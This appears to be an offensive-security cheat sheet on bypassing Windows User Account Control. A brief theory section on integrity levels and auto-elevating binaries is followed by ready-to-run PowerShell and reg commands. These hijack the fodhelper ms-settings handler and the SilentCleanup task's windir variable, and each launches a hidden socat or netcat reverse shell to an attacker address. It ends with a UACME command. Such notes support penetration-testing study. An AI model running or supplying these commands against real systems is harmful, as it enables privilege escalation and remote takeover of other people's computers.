UAC Bypass

Theory

The User Account Control . Its a Windows security feature that forces any new process to run in the security context of a non-privileged account by default..

Integrity Levels

UAC is a Mandatory Integrity Control (MIC), which is a mechanism that allows differentiating users, processes and resources by assigning an Integrity Level (IL) to each of them. In general terms, users or processes with a higher IL access token will be able to access resources with lower or equal ILs. MIC takes precedence over regular Windows DACLs The following 4 ILs are used by Windows, ordered from lowest to highest:

AutoElevate

some executables can auto-elevate, achieving high IL without any user intervention. This applies to most of the Control Panel's functionality and some executables provided with Windows. For an application, some requirements need to be met to auto-elevate: - The executable must be signed by the Windows Publisher - The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/ - Executable files (.exe) must declare the autoElevate element inside their manifests. To check a file's manifest, we can use sigcheck.

Indeed we can leverage this executables to bypass UAC. Let's dive in:

Practice

Microsoft doesn't consider UAC a security boundary but rather a simple convenience to the administrator to avoid unnecessarily running processes with administrative privileges. In that sense any bypass technique is not considered a vulnerability to Microsoft, and therefore some of them remain unpatched to this day.

Using ProgID and AutoElevate binary to bypass UAC

We will create an entry on the registry for a new progID of our choice (any name will do) and then point the CurVer entry in the ms-settings progID to our newly created progID. This way, when fodhelper tries opening a file using the ms-settings progID, it will notice the CurVer entry pointing to our new progID and check it to see what command to use.

# Using socat
$program = "powershell -windowstyle hidden C:\tools\socat\socat TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"
# Or using netcat
$program = "powershell -windowstyle hidden C:\Windows\Temp\nc64 192.168.49.113 443 -e cmd.exe"

New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
    
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
    
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"

C:\> reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
The operation completed successfully.

C:\> reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
The operation completed successfully.

C:\> fodhelper.exe

DiskCleanup Scheduled Task to bypass UAC

SilentCleanup launches cleanmgr.exe using the %windir% environment variable. By modifying %windir%, we can control what gets executed.

Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\nc64.exe <IP> <PORT> & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup" -TaskName "SilentCleanup"

Clear-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Force

reg add "HKCU\Environment" /v windir /t REG_SZ /d "cmd.exe /K C:\Windows\Tasks\nc64.exe <IP> <PORT> & REM " /f
schtasks /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup"

reg delete "HKCU\Environment" /v windir /f

Automated Exploitation

C:\tools>UACME-Akagi64.exe 33

Resources